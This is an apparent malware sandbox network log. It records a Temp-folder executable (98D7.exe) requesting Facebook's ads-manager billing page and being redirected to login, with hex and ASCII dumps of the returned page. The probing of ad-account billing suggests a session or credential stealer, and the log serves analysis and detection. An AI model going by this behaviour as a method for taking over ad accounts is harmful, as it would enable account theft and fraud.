                                                                                    2023-02-07 18:46:15 UTC1307INData Raw: 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 45 2f 6c 2f 30 2c 63 72 6f 73 73 2f 52 73 70 77 45 31 55 59 4c 77 72 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 20 61 73 3d 22 73 74 79 6c 65 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 45 2f 6c 2f 30 2c 63 72 6f 73 73 2f 78 42 50 71 35 75 45 68 6c 65 63 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 20 61 73 3d 22 73 74 79 6c 65 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65
                                                                                    Data Ascii: ="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3/yE/l/0,cross/RspwE1UYLwr.css?_nc_x=Ij3Wp8lg5Kz" as="style" /><link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3/yE/l/0,cross/xBPq5uEhlec.css?_nc_x=Ij3Wp8lg5Kz" as="style" /><link re
                                                                                    2023-02-07 18:46:15 UTC1309INData Raw: 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 39 2f 6c 2f 30 2c 63 72 6f 73 73 2f 4f 4d 5f 77 32 65 72 66 35 53 70 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 20 61 73 3d 22 73 74 79 6c 65 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 61 2f 6c 2f 30 2c 63 72 6f 73 73 2f 36 6e 30 41 66 6e 4b 53 51 4f 62 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 20 61 73 3d 22 73 74 79 6c 65 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 5f 5f 62 69 67 50 69 70 65 43 74 6f 72 3d 6e 6f 77 5f 69 6e 6c 28 29 3b 72 65 71 75 69
                                                                                    Data Ascii: bcdn.net/rsrc.php/v3/y9/l/0,cross/OM_w2erf5Sp.css?_nc_x=Ij3Wp8lg5Kz" as="style" /><link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3/ya/l/0,cross/6n0AfnKSQOb.css?_nc_x=Ij3Wp8lg5Kz" as="style" /><script>window.__bigPipeCtor=now_inl();requi
                                                                                    2023-02-07 18:46:15 UTC1310INData Raw: 2f 73 63 72 69 70 74 3e 0d 0a
                                                                                    Data Ascii: /script>
                                                                                    2023-02-07 18:46:15 UTC1310INData Raw: 31 32 38 39 0d 0a 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 32 43 75 67 58 54 72 45 22 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 3d 6e 6f 77 5f 69 6e 6c 28 29 3b 72 65 71 75 69 72 65 4c 61 7a 79 28 5b 22 5f 5f 62 69 67 50 69 70 65 22 5d 2c 66 75 6e 63 74 69 6f 6e 28 62 69 67 50 69 70 65 29 7b 62 69 67 50 69 70 65 2e 62 65 66 6f 72 65 50 61 67 65 6c 65 74 41 72 72 69 76 65 28 22 6c 61 73 74 5f 72 65 73 70 6f 6e 73 65 22 2c 6e 29 3b 7d 29 7d 29 28 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 32 43 75 67 58 54 72 45 22 3e 72 65 71 75 69 72 65 4c 61 7a 79 28 5b 22 5f 5f 62 69 67 50 69 70 65 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 62 69 67 50 69 70 65 29 7b 62 69 67 50 69 70 65 2e 6f 6e 50 61 67 65 6c 65 74 41
                                                                                    Data Ascii: 1289<script nonce="2CugXTrE">(function(){var n=now_inl();requireLazy(["__bigPipe"],function(bigPipe){bigPipe.beforePageletArrive("last_response",n);})})();</script><script nonce="2CugXTrE">requireLazy(["__bigPipe"],(function(bigPipe){bigPipe.onPageletA
                                                                                    2023-02-07 18:46:15 UTC1312INData Raw: 58 61 59 4f 53 33 39 33 48 57 47 50 47 6b 73 37 57 57 4c 38 45 77 7a 50 4a 44 42 4f 6f 47 43 4b 73 74 61 64 41 69 4f 4a 4b 63 33 56 5f 46 30 6c 4e 48 78 36 45 79 70 6d 74 35 63 76 43 6f 56 31 72 73 34 77 71 6a 53 2d 48 30 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 31 30 38 33 31 31 36 22 2c 5b 22 58 41 73 79 6e 63 52 65 71 75 65 73 74 22 5d 2c 7b 5f 5f 72 63 3a 5b 22 58 41 73 79 6e 63 52 65 71 75 65 73 74 22 2c 22 41 61 33 42 36 4c 68 76 51 67 4f 5f 46 34 54 59 75 58 61 59 4f 53 33 39 33 48 57 47 50 47 6b 73 37 57 57 4c 38 45 77 7a 50 4a 44 42 4f 6f 47 43 4b 73 74 61 64 41 69 4f 4a 4b 63 33 56 5f 46 30 6c 4e 48 78 36 45 79 70 6d 74 35 63 76 43 6f 56 31 72 73 34 77 71 6a 53 2d 48 30 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 31 30 38 33 31 31 37 22 2c 5b 5d 2c 7b
                                                                                    Data Ascii: XaYOS393HWGPGks7WWL8EwzPJDBOoGCKstadAiOJKc3V_F0lNHx6Eypmt5cvCoV1rs4wqjS-H0"]},-1],["cr:1083116",["XAsyncRequest"],{__rc:["XAsyncRequest","Aa3B6LhvQgO_F4TYuXaYOS393HWGPGks7WWL8EwzPJDBOoGCKstadAiOJKc3V_F0lNHx6Eypmt5cvCoV1rs4wqjS-H0"]},-1],["cr:1083117",[],{
                                                                                    2023-02-07 18:46:15 UTC1313INData Raw: 6a 69 5a 70 47 7a 4c 44 4b 4e 63 6a 55 62 6f 6a 4c 54 6d 6e 44 32 56 6c 61 47 51 58 4a 63 56 41 4c 33 37 56 77 32 77 22 5d 7d 2c 2d 31 5d 2c 5b 22 42 61 6e 7a 61 69 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 4d 41 58 5f 53 49 5a 45 3a 31 30 30 30 30 2c 4d 41 58 5f 57 41 49 54 3a 31 35 30 30 30 30 2c 4d 49 4e 5f 57 41 49 54 3a 6e 75 6c 6c 2c 52 45 53 54 4f 52 45 5f 57 41 49 54 3a 31 35 30 30 30 30 2c 62 6c 61 63 6b 6c 69 73 74 3a 5b 22 74 69 6d 65 5f 73 70 65 6e 74 22 5d 2c 64 69 73 61 62 6c 65 64 3a 66 61 6c 73 65 2c 67 6b 73 3a 7b 62 6f 6f 73 74 65 64 5f 70 61 67 65 6c 69 6b 65 73 3a 74 72 75 65 2c 6d 65 72 63 75 72 79 5f 73 65 6e 64 5f 65 72 72 6f 72 5f 6c 6f 67 67 69 6e 67 3a 74 72 75 65 2c 70 6c 61 74 66 6f 72 6d 5f 6f 61 75 74 68 5f 63 6c 69 65 6e 74 5f 65
                                                                                    Data Ascii: jiZpGzLDKNcjUbojLTmnD2VlaGQXJcVAL37Vw2w"]},-1],["BanzaiConfig",[],{MAX_SIZE:10000,MAX_WAIT:150000,MIN_WAIT:null,RESTORE_WAIT:150000,blacklist:["time_spent"],disabled:false,gks:{boosted_pagelikes:true,mercury_send_error_logging:true,platform_oauth_client_e
                                                                                    2023-02-07 18:46:15 UTC1315INData Raw: 79 70 59 68 36 32 43 76 63 72 38 6a 69 5a 70 47 7a 4c 44 4b 4e 63 6a 55 62 6f 6a 4c 54 6d 6e 44 32 56 6c 61 47 51 58 4a 63 56 41 4c 33 37 56 77 32 77 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 39 38 33 38 34 34 22 2c 5b 5d 2c 7b 5f 5f 72 63 3a 5b 6e 75 6c 6c 2c 22 41 61 31 6e 4d 35 6f 57 7a 54 6a 4d 2d 64 32 51 71 7a 79 77 5a 38 37 7a 70 34 77 39 4d 4f 36 35 79 70 59 68 36 32 43 76 63 72 38 6a 69 5a 70 47 7a 4c 44 4b 4e 63 6a 55 62 6f 6a 4c 54 6d 6e 44 32 56 6c 61 47 51 58 4a 63 56 41 4c 33 37 56 77 32 77 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 35 32 37 38 22 2c 5b 22 52 65 61 63 74 44 4f 4d 2d 70 72 6f 64 2e 63 6c 61 73 73 69 63 22 5d 2c 7b 5f 5f 72 63 3a 5b 22 52 65 61 63 74 44 4f 4d 2d 70 72 6f 64 2e 63 6c 61 73 73 69 63 22 2c 22 41 61 30 59 32 0d 0a 61 61
                                                                                    Data Ascii: ypYh62Cvcr8jiZpGzLDKNcjUbojLTmnD2VlaGQXJcVAL37Vw2w"]},-1],["cr:983844",[],{__rc:[null,"Aa1nM5oWzTjM-d2QqzywZ87zp4w9MO65ypYh62Cvcr8jiZpGzLDKNcjUbojLTmnD2VlaGQXJcVAL37Vw2w"]},-1],["cr:5278",["ReactDOM-prod.classic"],{__rc:["ReactDOM-prod.classic","Aa0Y2aa
                                                                                    2023-02-07 18:46:15 UTC1316INData Raw: 2c 5b 5d 2c 7b 73 61 6d 70 6c 69 6e 67 5f 72 61 74 65 3a 30 7d 2c 34 32 33 5d 5d 2c 72 65 71 75 69 72 65 3a 5b 5b 22 4e 61 76 69 67 61 74 69 6f 6e 4d 65 74 72 69 63 73 22 2c 22 73 65 74 50 61 67 65 22 2c 5b 5d 2c 5b 7b 70 61 67 65 3a 22 2f 6c 6f 67 69 6e 2e 70 68 70 22 2c 70 61 67 65 5f 74 79 70 65 3a 22 6e 6f 72 6d 61 6c 22 2c 70 61 67 65 5f 75 72 69 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 6c 6f 67 69 6e 2e 70 68 70 3f 6e 65 78 74 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 25 32 46 61 64 73 25 32 46 6d 61 6e 61 67 65 72 25 32 46 61 63 63 6f 75 6e 74 5f 73 65 74 74 69 6e 67 73 25 32 46 61 63 63 6f 75 6e 74 5f 62 69 6c 6c 69 6e 67 22 2c 73 65 72 76 65 72 4c 49 44 3a
                                                                                    Data Ascii: ,[],{sampling_rate:0},423]],require:[["NavigationMetrics","setPage",[],[{page:"/login.php",page_type:"normal",page_uri:"https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing",serverLID:


                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                    17192.168.2.349760157.240.253.35443C:\Users\user\AppData\Local\Temp\98D7.exe
                                                                                    TimestampkBytes transferredDirectionData
                                                                                    2023-02-07 18:46:25 UTC1318OUTGET /ads/manager/account_settings/account_billing HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                    Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
                                                                                    Host: www.facebook.com
                                                                                    User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70
                                                                                    sec-ch-ua: "Not_A Brand";v="99", "Microsoft Edge";v="109", "Chromium";v="109"
                                                                                    sec-ch-ua-mobile: ?0
                                                                                    sec-ch-ua-platform: "Windows"
                                                                                    sec-ch-prefers-color-scheme: light
                                                                                    Upgrade-Insecure-Requests: 1
                                                                                    Sec-Fetch-Site: none
                                                                                    Sec-Fetch-Mode: navigate
                                                                                    Sec-Fetch-User: ?1
                                                                                    Sec-Fetch-Dest: document
                                                                                    2023-02-07 18:46:25 UTC1318INHTTP/1.1 302 Found
                                                                                    Location: https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing
                                                                                    x-fb-rlafr: 0
                                                                                    content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com *.fbcdn.net 'unsafe-eval';script-src *.facebook.com *.fbcdn.net 'unsafe-inline' blob: data: 'self' 'unsafe-eval';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' http://localhost:3103 wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net facebook.com fbwifigateway.net *.fbwifigateway.net fbcdn.net cdninstagram.com *.cdninstagram.com oculuscdn.com *.oculuscdn.com www.meta.com *.www.meta.com;worker-src blob: *.facebook.com data:;block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0;
                                                                                    document-policy: force-load-at-top
                                                                                    cross-origin-resource-policy: same-origin
                                                                                    cross-origin-opener-policy: same-origin-allow-popups
                                                                                    Pragma: no-cache
                                                                                    Cache-Control: private, no-cache, no-store, must-revalidate
                                                                                    Expires: Sat, 01 Jan 2000 00:00:00 GMT
                                                                                    X-Content-Type-Options: nosniff
                                                                                    X-XSS-Protection: 0
                                                                                    X-Frame-Options: DENY
                                                                                    origin-agent-cluster: ?0
                                                                                    Strict-Transport-Security: max-age=15552000; preload
                                                                                    Content-Type: text/html; charset="utf-8"
                                                                                    X-FB-Debug: AcTy92sFmsocZZW4mHAa9EaJbHK/5hCCfTNmBcpyXOo3g6VvPG1OHh4X/BXaVFrKaiGNww0BDx/Wmmrz808z9Q==
                                                                                    2023-02-07 18:46:25 UTC1320INData Raw: 44 61 74 65 3a 20 54 75 65 2c 20 30 37 20 46 65 62 20 32 30 32 33 20 31 38 3a 34 36 3a 32 35 20 47 4d 54 0d 0a 41 6c 74 2d 53 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 0d 0a
                                                                                    Data Ascii: Date: Tue, 07 Feb 2023 18:46:25 GMTAlt-Svc: h3=":443"; ma=86400Connection: closeContent-Length: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                    18192.168.2.349763157.240.253.35443C:\Users\user\AppData\Local\Temp\98D7.exe
                                                                                    TimestampkBytes transferredDirectionData
                                                                                    2023-02-07 18:46:25 UTC1320OUTGET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                    Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
                                                                                    Host: www.facebook.com
                                                                                    User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70
                                                                                    sec-ch-ua: "Not_A Brand";v="99", "Microsoft Edge";v="109", "Chromium";v="109"
                                                                                    sec-ch-ua-mobile: ?0
                                                                                    sec-ch-ua-platform: "Windows"
                                                                                    sec-ch-prefers-color-scheme: light
                                                                                    Upgrade-Insecure-Requests: 1
                                                                                    Sec-Fetch-Site: none
                                                                                    Sec-Fetch-Mode: navigate
                                                                                    Sec-Fetch-User: ?1
                                                                                    Sec-Fetch-Dest: document
                                                                                    2023-02-07 18:46:25 UTC1321INHTTP/1.1 200 OK
                                                                                    Vary: Accept-Encoding
                                                                                    report-to: {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/?minimize=0"}],"group":"coep_report"}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}
                                                                                    cross-origin-embedder-policy-report-only: require-corp;report-to="coep_report"
                                                                                    x-fb-rlafr: 0
                                                                                    content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com *.fbcdn.net 'unsafe-eval';script-src *.facebook.com *.fbcdn.net 'unsafe-inline' blob: data: 'self' 'unsafe-eval';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' http://localhost:3103 wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net;worker-src blob: *.facebook.com data:;block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0;
                                                                                    document-policy: force-load-at-top
                                                                                    cross-origin-opener-policy: same-origin-allow-popups
                                                                                    Pragma: no-cache
                                                                                    Cache-Control: private, no-cache, no-store, must-revalidate
                                                                                    Expires: Sat, 01 Jan 2000 00:00:00 GMT
                                                                                    X-Content-Type-Options: nosniff
                                                                                    X-XSS-Protection: 0
                                                                                    X-Frame-Options: DENY
                                                                                    origin-agent-cluster: ?0
                                                                                    Strict-Transport-Security: max-age=15552000; preload
                                                                                    Content-Type: text/html; charset="utf-8"
                                                                                    X-FB-Debug: jDIFvaIdZrodOmD2LtJI/IxZz9yPl+IfmTemGblFBbv3zpjVH5HH25Y/xavuKgwkHBp5MjR/7FbtOfz88EiUhQ==
                                                                                    2023-02-07 18:46:25 UTC1323INData Raw: 44 61 74 65 3a 20 54 75 65 2c 20 30 37 20 46 65 62 20 32 30 32 33 20 31 38 3a 34 36 3a 32 35 20 47 4d 54 0d 0a 50 72 69 6f 72 69 74 79 3a 20 75 3d 33 2c 69 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 41 6c 74 2d 53 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a
                                                                                    Data Ascii: Date: Tue, 07 Feb 2023 18:46:25 GMTPriority: u=3,iTransfer-Encoding: chunkedAlt-Svc: h3=":443"; ma=86400Connection: close
                                                                                    2023-02-07 18:46:25 UTC1323INData Raw: 33 64 37 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 69 64 3d 22 66 61 63 65 62 6f 6f 6b 22 20 63 6c 61 73 73 3d 22 6e 6f 5f 6a 73 22 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6f 72 69 67 69 6e 2d 77 68 65 6e 2d 63 72 6f 73 73 6f 72 69 67 69 6e 22 20 69 64 3d 22 6d 65 74 61 5f 72 65 66 65 72 72 65 72 22 20 2f 3e 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 78 34 36 48 56 30 47 38 22 3e 66 75 6e 63 74 69 6f 6e 20 65 6e 76 46 6c 75 73 68 28 61 29 7b 66 75 6e 63 74 69 6f 6e 20 62 28 62 29 7b 66 6f 72 28 76 61 72 20 63 20 69 6e 20 61 29 62 5b 63 5d 3d 61
                                                                                    Data Ascii: 3d7e<!DOCTYPE html><html lang="en" id="facebook" class="no_js"><head><meta charset="utf-8" /><meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" /><script nonce="x46HV0G8">function envFlush(a){function b(b){for(var c in a)b[c]=a
                                                                                    2023-02-07 18:46:25 UTC1325INData Raw: 53 65 65 20 70 6f 73 74 73 2c 20 70 68 6f 74 6f 73 20 61 6e 64 20 6d 6f 72 65 20 6f 6e 20 46 61 63 65 62 6f 6f 6b 2e 22 20 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 79 76 2f 72 2f 42 38 42 78 73 73 63 66 56 42 72 2e 69 63 6f 22 20 2f 3e 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 45 2f 6c 2f 30 2c 63 72 6f 73 73 2f 52 73 70 77 45 31 55 59 4c 77 72 2e 63 73 73 3f 5f 6e 63 5f 78
                                                                                    Data Ascii: See posts, photos and more on Facebook." /><link rel="shortcut icon" href="https://static.xx.fbcdn.net/rsrc.php/yv/r/B8BxsscfVBr.ico" /><link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v3/yE/l/0,cross/RspwE1UYLwr.css?_nc_x
                                                                                    2023-02-07 18:46:25 UTC1326INData Raw: 75 70 70 6f 72 74 44 61 74 61 22 5d 2c 66 75 6e 63 74 69 6f 6e 28 6d 29 7b 6d 2e 68 61 6e 64 6c 65 28 7b 22 63 6c 70 44 61 74 61 22 3a 7b 22 31 38 31 34 38 35 32 22 3a 7b 22 72 22 3a 31 7d 2c 22 31 38 33 38 31 34 32 22 3a 7b 22 72 22 3a 31 2c 22 73 22 3a 31 7d 2c 22 31 39 34 39 38 39 38 22 3a 7b 22 72 22 3a 31 7d 2c 22 31 38 34 38 38 31 35 22 3a 7b 22 72 22 3a 31 30 30 30 30 2c 22 73 22 3a 31 7d 2c 22 31 37 34 34 31 37 38 22 3a 7b 22 72 22 3a 31 2c 22 73 22 3a 31 7d 7d 2c 22 67 6b 78 44 61 74 61 22 3a 7b 22 36 37 36 38 33 37 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 34 4e 38 77 42 5a 41 38 63 74 43 64 48 77 42 5a 73 22 7d 2c 22 36 37 36 39 32 30 22 3a 7b 22 72 65 73 75 6c 74 22 3a 74 72 75 65 2c 22 68 61 73 68 22
                                                                                    Data Ascii: upportData"],function(m){m.handle({"clpData":{"1814852":{"r":1},"1838142":{"r":1,"s":1},"1949898":{"r":1},"1848815":{"r":10000,"s":1},"1744178":{"r":1,"s":1}},"gkxData":{"676837":{"result":false,"hash":"AT4N8wBZA8ctCdHwBZs"},"676920":{"result":true,"hash"
                                                                                    2023-02-07 18:46:25 UTC1328INData Raw: 33 31 5d 2c 5b 22 43 6f 6f 6b 69 65 44 6f 6d 61 69 6e 22 2c 5b 5d 2c 7b 22 64 6f 6d 61 69 6e 22 3a 22 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 22 7d 2c 36 34 32 31 5d 2c 5b 22 43 75 72 72 65 6e 74 41 64 41 63 63 6f 75 6e 74 49 6e 69 74 69 61 6c 44 61 74 61 22 2c 5b 5d 2c 7b 22 41 44 5f 41 43 43 4f 55 4e 54 5f 49 44 22 3a 6e 75 6c 6c 7d 2c 36 38 32 38 5d 2c 5b 22 42 6f 6f 74 6c 6f 61 64 65 72 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 22 64 65 66 65 72 42 6f 6f 74 6c 6f 61 64 73 22 3a 66 61 6c 73 65 2c 22 6a 73 52 65 74 72 69 65 73 22 3a 5b 32 30 30 2c 35 30 30 5d 2c 22 6a 73 52 65 74 72 79 41 62 6f 72 74 4e 75 6d 22 3a 32 2c 22 6a 73 52 65 74 72 79 41 62 6f 72 74 54 69 6d 65 22 3a 35 2c 22 73 69 6c 65 6e 74 44 75 70 73 22 3a 66 61 6c 73 65 2c 22 68 79 70 53 74 65 70
                                                                                    Data Ascii: 31],["CookieDomain",[],{"domain":"facebook.com"},6421],["CurrentAdAccountInitialData",[],{"AD_ACCOUNT_ID":null},6828],["BootloaderConfig",[],{"deferBootloads":false,"jsRetries":[200,500],"jsRetryAbortNum":2,"jsRetryAbortTime":5,"silentDups":false,"hypStep
                                                                                    2023-02-07 18:46:25 UTC1329INData Raw: 53 45 4e 47 45 52 22 3a 66 61 6c 73 65 2c 22 49 53 5f 4d 45 53 53 45 4e 47 45 52 5f 43 41 4c 4c 5f 47 55 45 53 54 5f 55 53 45 52 22 3a 66 61 6c 73 65 2c 22 49 53 5f 57 4f 52 4b 5f 4d 45 53 53 45 4e 47 45 52 5f 43 41 4c 4c 5f 47 55 45 53 54 5f 55 53 45 52 22 3a 66 61 6c 73 65 2c 22 49 53 5f 57 4f 52 4b 52 4f 4f 4d 53 5f 55 53 45 52 22 3a 66 61 6c 73 65 2c 22 41 50 50 5f 49 44 22 3a 22 32 35 36 32 38 31 30 34 30 35 35 38 22 2c 22 49 53 5f 42 55 53 49 4e 45 53 53 5f 44 4f 4d 41 49 4e 22 3a 66 61 6c 73 65 7d 2c 32 37 30 5d 2c 5b 22 44 54 53 47 49 6e 69 74 69 61 6c 44 61 74 61 22 2c 5b 5d 2c 7b 7d 2c 32 35 38 5d 2c 5b 22 49 53 42 22 2c 5b 5d 2c 7b 7d 2c 33 33 30 5d 2c 5b 22 4c 53 44 22 2c 5b 5d 2c 7b 22 74 6f 6b 65 6e 22 3a 22 41 56 6f 4e 36 5a 52 73 57 6a 34
                                                                                    Data Ascii: SENGER":false,"IS_MESSENGER_CALL_GUEST_USER":false,"IS_WORK_MESSENGER_CALL_GUEST_USER":false,"IS_WORKROOMS_USER":false,"APP_ID":"256281040558","IS_BUSINESS_DOMAIN":false},270],["DTSGInitialData",[],{},258],["ISB",[],{},330],["LSD",[],{"token":"AVoN6ZRsWj4
                                                                                    2023-02-07 18:46:25 UTC1331INData Raw: 2c 5b 5d 2c 7b 22 6b 69 6c 6c 65 64 22 3a 7b 22 5f 5f 73 65 74 22 3a 5b 22 4d 4c 48 55 42 5f 46 4c 4f 57 5f 41 55 54 4f 52 45 46 52 45 53 48 5f 53 45 41 52 43 48 22 2c 22 4e 45 4b 4f 5f 44 49 53 41 42 4c 45 5f 43 52 45 41 54 45 5f 46 4f 52 5f 53 41 50 22 2c 22 45 4f 5f 44 49 53 41 42 4c 45 5f 53 59 53 54 45 4d 5f 53 45 52 49 41 4c 5f 4e 55 4d 42 45 52 5f 46 52 45 45 5f 54 59 50 49 4e 47 5f 49 4e 5f 43 50 45 5f 4e 4f 4e 5f 43 4c 49 45 4e 54 22 2c 22 4d 4f 42 49 4c 49 54 59 5f 4b 49 4c 4c 5f 4f 4c 44 5f 56 49 53 49 42 49 4c 49 54 59 5f 50 4f 53 49 54 49 4f 4e 5f 53 45 54 54 49 4e 47 22 2c 22 57 4f 52 4b 50 4c 41 43 45 5f 44 49 53 50 4c 41 59 5f 54 45 58 54 5f 45 56 49 44 45 4e 43 45 5f 52 45 50 4f 52 54 49 4e 47 22 2c 22 42 55 53 49 4e 45 53 53 5f 49 4e 56
